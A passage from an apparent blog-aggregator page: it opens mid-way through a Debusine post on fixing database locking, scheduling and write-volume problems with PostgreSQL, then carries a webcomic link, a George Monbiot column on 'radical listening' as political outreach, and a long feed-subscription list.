Workflow orchestration

Figuring out what individual work requests need to be run as part of a workflow - the process we call “orchestration” - can be challenging. Unlike typical CI pipelines, these workflows often span substantial chunks of a distribution: a glibc update can involve retesting nearly everything! Nevertheless, it’s not particularly helpful for it to take hours just to build the workflow graph.

Fixing this involved many classic database optimizations such as adding indexes and CTEs, but probably the most effective fix was adding a cache for lookups within each orchestrator run or work request. Profiling showed that resolving lookups was a hot spot, and the way that task data is often passed down through a workflow meant that the same lookup could be resolved hundreds or thousands of times in a large workflow.

Expiry

We knew for quite some time that our expiry job took very aggressive locks, effectively blocking most of the rest of the system. This was an early decision to make the expiry logic simpler by allowing it to follow graphs without worrying about concurrent activity, but it clearly couldn’t stay that way forever.

Row locks in PostgreSQL was very helpful in figuring out the correct approach here. Since we’re mainly concerned about the possibility of new foreign key references being created to artifacts we’re considering for expiry, and since that would involve taking FOR KEY SHARE locks on those rows, we can explicitly take FOR UPDATE locks (which conflict with FOR KEY SHARE), and then recompute the set of artifacts to expire with any locked artifacts marked to keep. This was delicate work, but it saved minutes of downtime every day.

Whole-workflow locking

I mentioned earlier that we avoided some deadlock issues by taking locks on entire workflows. To ensure that these locks are effective even against code that isn’t specifically aware of them, this is implemented by using SELECT FOR UPDATE on all the work request rows in the workflow. In some cases the search for which rows to lock itself tripped up the PostgreSQL planner.

Scheduling

We run multiple Celery workers for various purposes. Some of them can do many things in parallel, but in some specific cases (notably the task scheduler) we only ever want a single instance to run at once. Unfortunately a bug in the systemd service meant that the scheduler often ran concurrently anyway! Once we fixed that, the scheduler logs became a lot less confusing.

When Debusine was small, it was reasonable for it to perform scheduling very aggressively, typically as soon as any change occurred to a work request or a worker that might possibly influence it. This doesn’t scale very well, though, and even though we tried to batch multiple scheduling triggers that occurred within a single transaction, it could still make debugging very confusing. We reduced the number of changes that would result in immediate scheduling, and deferred everything else to a regular “tick”.

The scheduler may not be able to assign a work request to an idle worker due to the workflow being locked. That isn’t a major problem in itself; it can just try again later. However, in very large workflows, we found that it often worked its way down all the pending work requests one by one finding that each of them was locked, which was slow and also produced a huge amount of log noise. It now assumes that if a work request is locked, then it might as well skip other work requests in the same workflow until the next scheduler run.

Between them, these changes reduced the number of locks typically being held on debusine.debian.net by about 80%:

Lock graph

Worker refactoring

The Debusine worker has always been partially asynchronous, but while it was actually executing a task - in other words, most of the time, at least in busy periods - it didn’t respond to inbound websocket messages, causing spurious disconnections. We restructured the whole worker to be fully event-based.

We also had to put quite a bit of effort into improving the path by which workers report work request completion, because if that hits a timeout then it can mean throwing away hours of work. We have some further improvements in mind, but for now we defer most of this work to a Celery task so that whole-workflow locks aren’t on the critical path.

Database write volume

One of our sysadmins observed that our database write volume was consistently very high. This was a puzzle, but for a long time we left that unexplored. Eventually we thought to ask PostgreSQL’s own statistics, and we found a surprise:

debusine=> SELECT relname AS table_name,
debusine->        n_tup_ins AS inserts,
debusine->        n_tup_upd AS updates,
debusine->        n_tup_del AS deletes,
debusine->        (n_tup_ins + n_tup_upd + n_tup_del) AS total_dml
debusine-> FROM pg_stat_user_tables
debusine-> WHERE (n_tup_ins + n_tup_upd + n_tup_del) > 0
debusine-> ORDER BY total_dml DESC
debusine-> LIMIT 20;
              table_name              | inserts |  updates   | deletes | total_dml
--------------------------------------+---------+------------+---------+------------
 db_collectionitem                    | 1418251 | 3578202388 | 3630143 | 3583250782
 db_token                             |   15143 |   11212106 |   11389 |   11238638
 db_workrequest                       |  386196 |    6399071 | 1820500 |    8605767
 db_fileinartifact                    | 2783021 |    1837929 | 1663887 |    6284837
 django_celery_results_taskresult     | 1819301 |    1501623 | 1791656 |    5112580
 db_artifact                          |  960077 |    3340859 |  663890 |    4964826
 db_collectionitemmatchconstraint     | 1550457 |          0 | 2207486 |    3757943
 db_artifactrelation                  | 2229382 |          0 | 1363825 |    3593207
 db_fileupload                        | 1023400 |    1057036 | 1023346 |    3103782
 db_file                              | 1673194 |          0 |  970252 |    2643446
 db_fileinstore                       | 1411995 |          0 |  970259 |    2382254
 db_filestore                         |       0 |    2381578 |       0 |    2381578
 django_session                       |  645423 |    1519880 |     531 |    2165834
 db_workrequest_dependencies          |  365877 |          0 |  936537 |    1302414
 db_worker                            |   18317 |     949280 |    9487 |     977084
 db_collection                        |   10061 |         85 |  177741 |     187887
 db_workerpooltaskexecutionstatistics |   28721 |          0 |       0 |      28721
 db_workerpoolstatistics              |    1640 |          0 |       0 |       1640
 db_workflowtemplate                  |     130 |        158 |     649 |        937
 db_identity                          |      76 |        661 |       0 |        737
(20 rows)

Oh my - that’s a lot of db_collectionitem updates and must surely be out of proportion with what we really need. Can we narrow that down by asking about the most recently-updated tuples?

debusine=> SELECT DISTINCT category
debusine-> FROM db_collectionitem
debusine-> WHERE id IN (
debusine->     SELECT id FROM db_collectionitem
debusine->     ORDER BY xmin::text::integer DESC LIMIT 10000
debusine-> );
           category
------------------------------
 debusine:historical-task-run
(1 row)

That might not be absolutely reliable, but it was certainly a hint. As per PostgreSQL’s documentation, by default UPDATE always performs physical updates to every matching row regardless of whether the data has changed, and our code to expire old task history entries wasn’t doing that properly. Once we knew where to look, it was easy to add some extra constraints.

This reduced our mean write volume on debusine.debian.net from about 23 MB/s to about 3 MB/s, which had an immediate knock-on effect on our request failure rate:

Disk write graph

HTTP errors

Current state

Our metrics indicate that things are a lot better now. We still have a few things to deal with, such as:

  • Some more performance fixes are on their way to fix some remaining cases where views are very slow or where file uploads from workers fail due to locks.
  • We have some changes in the works to revamp how work request changes propagate through workflows in a way that doesn’t require so many heavyweight locks.
  • We have a number of monitoring and alerting improvements we’d like to make, both for outcomes (things like slow Celery tasks) and possible root causes (database performance). We’d also like to deploy some more modern observability tools; hunting for things using journalctl isn’t terrible, but it’s not really the state of the art.
  • We need to improve how we communicate to users when we’re having operational problems, both informally (IRC, etc.) and on the site.
  • Retries don’t always behave the way you’d expect in workflows.

I hope this has been an interesting tour through the sorts of things that can go wrong in this kind of distributed system!

08:49

In Bloom [Penny Arcade]

New Comic: In Bloom

06:56

Hear This [George Monbiot]

Radical Listening could transform our politics and block the rise of the far right.

By George Monbiot, published in the Guardian 7th May 2026

Most people have made up their minds, and nothing you can say will change them: that’s the credo of parties such as Labour and the Democrats. Don’t challenge voters on the doorstep. Use focus groups to find out what they want, and give it to them. Follow, don’t lead. But all that’s on them, not us.

It’s true that conventional attempts at persuasion fail. A meta-analysis and original experiments by the political scientists Joshua Kalla and David Broockman found that “the best estimate of the effects of campaign contact and advertising” in US general elections “is zero”. But this says nothing about voters and everything about the useless approach of the parties trying to reach them.

Further work by the same scientists along with other people’s studies show that persuasive methods do exist. They don’t change everyone’s minds, but they can make enough difference to win elections and build a kinder, fairer, greener country. These techniques are known as “deep canvassing”.

Deep canvassing works only if you have a large army of volunteers, ideally from the community you’re trying to reach. Instead of delivering a message then scuttling away, as conventional canvassers do, their role is to connect and listen. Across conversations that might last for 10 or 20 minutes, they let people discuss their feelings. Then, without arguing or judging, they share their own experiences and ask questions (“have you ever been treated unfairly?”) that might reveal common ground.

The technique was developed by LGBT activists in Los Angeles after same-sex marriage rights were not voted into law in a state referendum. They wanted to find out why and to see whether people could change their minds. They were amazed by the response, and asked researchers to study the technique. The effects turned out to be significant.

Not only is deep canvassing persuasive but, by contrast to almost all other approaches, the change appears to be durable, at least over the course of months. It seems to have been a decisive factor in the election of Zohran Mamdani as mayor of New York.

What makes the difference is the listening. There’s a solid rule in life: if you don’t listen to other people, they won’t listen to you. I’m often told that people are “too exhausted” to engage in politics. That can mean they’re overwhelmed by work and family life. But it can also refer to the exhaustion of being unheard. The sense that no one is listening is alienating and demoralising.

Another benefit is that deep canvassing allows people to change their minds without losing face. A study in the journal Political Communication found that when someone is heard attentively and without judgment, “they are more likely to become more open-minded and process information in a less defensive manner”. Active listening creates “a sense of shared social identity”, which can build “faith in wider democratic processes”.

All this is compelling enough, but there may be an even more effective means of connection (though it awaits quantification). I’ve been following the work of a remarkable group in my own constituency, South Devon, called Common Ground. It’s not attached to any party, but seeks to prevent the far right from gaining power, to counteract division and create what it calls “a longing for kindness”. Its annual budget is under £400. Instead of going to people’s doors, the volunteers set up a board in a busy street and begin by asking people to put stickers on a chart.

That’s another solid rule in life: people love stickers. On the board are questions designed to provoke conversation on issues such as the NHS, climate, the voting system, immigration, social media, Brexit, public services and polarisation, and boxes in which you can agree or disagree by adding a sticker.

The board is handwritten. Anthea Simmons, the driving force behind Common Ground, tells me this provides a reason to read out the questions to people who may be illiterate without embarrassing them. It’s also a way of starting a conversation. Then the volunteers ask people why they’ve made their choices. They listen attentively, occasionally saying something that connects their experiences, or gently correcting disinformation. It might be quick, it might go on for half an hour.

I’ve watched them at work in two places with high levels of deprivation and social crisis: Paignton and Brixham. These are prime targets for Reform UK, as alienation can easily be channelled into fury at immigrants and other out-groups.

In both places, a small crowd quickly formed around the board and people began chatting to each other as well as the volunteers. “Climate?” one person said. “It’s not affecting us very much yet.” Another replied: “My allotment disagrees. It’s a swamp.”

What leapt out immediately was that most respondents were far to the left of their own voting intentions. The distribution of their stickers suggested a very strong commitment to the NHS, action on climate, compassion, tolerance and an end to billionaire power. But many of the same people have voted or intend to vote for Reform, which would deliver the opposite. This discovery seemed to be equally startling to the participants.

Another thing I witnessed, especially when interviewing people just after these conversations, was a sense of relief, even exhilaration. People were buzzing. Some hardly seemed to hear my questions, but carried on talking about the issues that bothered them: the lack of NHS dentistry, the state of the harbour, corruption, AI, litter, the care crisis. It was as if a bottle had been uncorked.

Being heard is valuable in its own right. Loneliness and alienation, as well as being the feedstock of fascism, are major causes of human misery. The volunteers have been told by some people that it’s the only conversation they’ve had all week. Their overwhelming conclusion? People do care about the lives of others, even when influencers and algorithms push them towards hate and fear.

It wouldn’t be quite right to call this deep canvassing. The volunteers don’t have a script and they’re engaging across a range of issues rather than focusing on one. Perhaps it could be called “radical listening”. To judge by what I witnessed, they seem to have found a way of tearing down the walls dividing us. Do this everywhere, and who knows? We could have a very different country.

www.monbiot.com

Feeds

FeedRSSLast fetchedNext fetched after
@ASmartBear XML 22:07, Friday, 15 May 22:48, Friday, 15 May
a bag of four grapes XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Ansible XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Bad Science XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Black Doggerel XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Blog - Official site of Stephen Fry XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Charlie Brooker | The Guardian XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Charlie's Diary XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Chasing the Sunset - Comics Only XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Coding Horror XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Comics Archive - Spinnyverse XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Cory Doctorow's craphound.com XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Cory Doctorow, Author at Boing Boing XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Ctrl+Alt+Del Comic XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Cyberunions XML 21:56, Friday, 15 May 22:45, Friday, 15 May
David Mitchell | The Guardian XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Deeplinks XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Diesel Sweeties webcomic by rstevens XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Dilbert XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Dork Tower XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Economics from the Top Down XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Edmund Finney's Quest to Find the Meaning of Life XML 22:07, Friday, 15 May 22:50, Friday, 15 May
EFF Action Center XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Enspiral Tales - Medium XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Events XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Falkvinge on Liberty XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Flipside XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Flipside XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Free software jobs XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Full Frontal Nerdity by Aaron Williams XML 21:35, Friday, 15 May 22:23, Friday, 15 May
General Protection Fault: Comic Updates XML 21:35, Friday, 15 May 22:23, Friday, 15 May
George Monbiot XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Girl Genius XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Groklaw XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Grrl Power XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Hackney Anarchist Group XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Hackney Solidarity Network XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://blog.llvm.org/feeds/posts/default XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://calendar.google.com/calendar/feeds/q7s5o02sj8hcam52hutbcofoo4%40group.calendar.google.com/public/basic XML 21:56, Friday, 15 May 22:36, Friday, 15 May
http://dynamic.boingboing.net/cgi-bin/mt/mt-cp.cgi?__mode=feed&_type=posts&blog_id=1&id=1 XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://eng.anarchoblogs.org/feed/atom/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
http://feed43.com/3874015735218037.xml XML 22:14, Friday, 15 May 23:00, Friday, 15 May
http://flatearthnews.net/flatearthnews.net/blogfeed XML 22:07, Friday, 15 May 22:48, Friday, 15 May
http://fulltextrssfeed.com/ XML 22:07, Friday, 15 May 22:50, Friday, 15 May
http://london.indymedia.org/articles.rss XML 21:28, Friday, 15 May 22:15, Friday, 15 May
http://pipes.yahoo.com/pipes/pipe.run?_id=ad0530218c055aa302f7e0e84d5d6515&amp;_render=rss XML 22:14, Friday, 15 May 23:00, Friday, 15 May
http://planet.gridpp.ac.uk/atom.xml XML 21:28, Friday, 15 May 22:15, Friday, 15 May
http://shirky.com/weblog/feed/atom/ XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://thecommune.co.uk/feed/ XML 21:49, Friday, 15 May 22:34, Friday, 15 May
http://theness.com/roguesgallery/feed/ XML 21:35, Friday, 15 May 22:23, Friday, 15 May
http://www.airshipentertainment.com/buck/buckcomic/buck.rss XML 21:56, Friday, 15 May 22:45, Friday, 15 May
http://www.airshipentertainment.com/growf/growfcomic/growf.rss XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://www.airshipentertainment.com/myth/mythcomic/myth.rss XML 21:35, Friday, 15 May 22:17, Friday, 15 May
http://www.baen.com/baenebooks XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://www.feedsapi.com/makefulltextfeed.php?url=http%3A%2F%2Fwww.somethingpositive.net%2Fsp.xml&what=auto&key=&max=7&links=preserve&exc=&privacy=I+accept XML 21:49, Friday, 15 May 22:33, Friday, 15 May
http://www.godhatesastronauts.com/feed/ XML 21:35, Friday, 15 May 22:23, Friday, 15 May
http://www.tinycat.co.uk/feed/ XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://anarchism.pageabode.com/blogs/anarcho/feed/ XML 21:49, Friday, 15 May 22:33, Friday, 15 May
https://broodhollow.krisstraub.comfeed/ XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://debian-administration.org/atom.xml XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://elitetheatre.org/ XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://feeds.feedburner.com/Starslip XML 21:35, Friday, 15 May 22:17, Friday, 15 May
https://feeds2.feedburner.com/GeekEtiquette?format=xml XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://hackbloc.org/rss.xml XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://kajafoglio.livejournal.com/data/atom/ XML 21:56, Friday, 15 May 22:45, Friday, 15 May
https://philfoglio.livejournal.com/data/atom/ XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://pixietrixcomix.com/eerie-cutiescomic.rss XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://pixietrixcomix.com/menage-a-3/comic.rss XML 21:49, Friday, 15 May 22:33, Friday, 15 May
https://propertyistheft.wordpress.com/feed/ XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://requiem.seraph-inn.com/updates.rss XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://studiofoglio.livejournal.com/data/atom/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://thecommandline.net/feed/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://torrentfreak.com/subscriptions/ XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://web.randi.org/?format=feed&type=rss XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://www.dcscience.net/feed/medium.co XML 21:56, Friday, 15 May 22:45, Friday, 15 May
https://www.DropCatch.com/domain/steampunkmagazine.com XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://www.DropCatch.com/domain/ubuntuweblogs.org XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://www.DropCatch.com/redirect/?domain=DyingAlone.net XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://www.freedompress.org.uk:443/news/feed/ XML 21:35, Friday, 15 May 22:23, Friday, 15 May
https://www.goblinscomic.com/category/comics/feed/ XML 21:56, Friday, 15 May 22:36, Friday, 15 May
https://www.loomio.com/blog/feed/ XML 22:14, Friday, 15 May 23:00, Friday, 15 May
https://www.newstatesman.com/feeds/blogs/laurie-penny.rss XML 22:07, Friday, 15 May 22:48, Friday, 15 May
https://www.patreon.com/graveyardgreg/posts/comic.rss XML 21:28, Friday, 15 May 22:15, Friday, 15 May
https://www.rightmove.co.uk/rss/property-for-sale/find.html?locationIdentifier=REGION^876&maxPrice=240000&minBedrooms=2&displayPropertyType=houses&oldDisplayPropertyType=houses&primaryDisplayPropertyType=houses&oldPrimaryDisplayPropertyType=houses&numberOfPropertiesPerPage=24 XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://x.com/statuses/user_timeline/22724360.rss XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Humble Bundle Blog XML 21:28, Friday, 15 May 22:15, Friday, 15 May
I, Cringely XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Irregular Webcomic! XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Joel on Software XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Judith Proctor's Journal XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Krebs on Security XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Lambda the Ultimate - Programming Languages Weblog XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Looking For Group XML 21:49, Friday, 15 May 22:33, Friday, 15 May
LWN.net XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Mimi and Eunice XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Neil Gaiman's Journal XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Nina Paley XML 21:28, Friday, 15 May 22:15, Friday, 15 May
O Abnormal – Scifi/Fantasy Artist XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Oglaf! -- Comics. Often dirty. XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Oh Joy Sex Toy XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Order of the Stick XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Original Fiction Archives - Reactor XML 21:35, Friday, 15 May 22:17, Friday, 15 May
OSnews XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Paul Graham: Unofficial RSS Feed XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Penny Arcade XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Penny Red XML 21:49, Friday, 15 May 22:34, Friday, 15 May
PHD Comics XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Phil's blog XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Planet Debian XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Planet GNU XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Planet Lisp XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Pluralistic: Daily links from Cory Doctorow XML 21:56, Friday, 15 May 22:36, Friday, 15 May
PS238 by Aaron Williams XML 21:35, Friday, 15 May 22:23, Friday, 15 May
QC RSS XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Radar XML 21:35, Friday, 15 May 22:17, Friday, 15 May
RevK®'s ramblings XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Richard Stallman's Political Notes XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Scenes From A Multiverse XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Schneier on Security XML 21:56, Friday, 15 May 22:36, Friday, 15 May
SCHNEWS.ORG.UK XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Scripting News XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Seth's Blog XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Skin Horse XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Tales From the Riverbank XML 21:56, Friday, 15 May 22:45, Friday, 15 May
The Adventures of Dr. McNinja XML 21:49, Friday, 15 May 22:34, Friday, 15 May
The Bumpycat sat on the mat XML 21:56, Friday, 15 May 22:36, Friday, 15 May
The Daily WTF XML 22:14, Friday, 15 May 23:00, Friday, 15 May
The Monochrome Mob XML 22:07, Friday, 15 May 22:48, Friday, 15 May
The Non-Adventures of Wonderella XML 22:07, Friday, 15 May 22:50, Friday, 15 May
The Old New Thing XML 21:49, Friday, 15 May 22:33, Friday, 15 May
The Open Source Grid Engine Blog XML 21:28, Friday, 15 May 22:15, Friday, 15 May
The Stranger XML 21:49, Friday, 15 May 22:34, Friday, 15 May
towerhamletsalarm XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Twokinds XML 21:35, Friday, 15 May 22:17, Friday, 15 May
UK Indymedia Features XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Uploads from ne11y XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Uploads from piasladic XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Use Sword on Monster XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Wayward Sons: Legends - Sci-Fi Full Page Webcomic - Updates Daily XML 22:14, Friday, 15 May 23:00, Friday, 15 May
what if? XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Whatever XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Whitechapel Anarchist Group XML 21:56, Friday, 15 May 22:45, Friday, 15 May
WIL WHEATON dot NET XML 21:49, Friday, 15 May 22:33, Friday, 15 May
wish XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Writing the Bright Fantastic XML 21:49, Friday, 15 May 22:33, Friday, 15 May
xkcd.com XML 22:07, Friday, 15 May 22:50, Friday, 15 May